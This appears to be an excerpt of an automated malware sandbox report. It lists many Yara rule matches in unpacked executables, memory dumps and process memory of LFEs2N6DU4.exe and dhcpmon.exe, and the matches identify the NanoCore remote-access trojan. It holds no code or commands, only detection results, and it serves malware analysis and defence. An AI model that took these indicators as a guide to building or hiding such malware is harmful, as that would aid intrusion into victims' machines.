Source: Yara match	File source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.534572652.0000000002DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 25.2.dhcpmon.exe.3c005c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.dhcpmon.exe.3c005c4.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.dhcpmon.exe.3374bed.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.38a9b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.5650000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.24b0e9c.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.2bb0b34.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.2bb0b34.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3c59b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 24.2.LFEs2N6DU4.exe.41c05c4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.2bb0b34.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.2bb0b34.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.dhcpmon.exe.33705c4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.LFEs2N6DU4.exe.5650000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.2.dhcpmon.exe.2800d80.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.2800d80.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.2.dhcpmon.exe.2800d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.2800d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.dhcpmon.exe.3c04bed.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.dhcpmon.exe.2389698.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.3859b70.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.dhcpmon.exe.33705c4.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.LFEs2N6DU4.exe.3df05c4.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.34e1b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.3859b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.dhcpmon.exe.336b78e.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.55d0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.2.LFEs2N6DU4.exe.3141390.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.3141390.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.dhcpmon.exe.2c19698.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 24.2.LFEs2N6DU4.exe.31d96e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.2dcecf4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
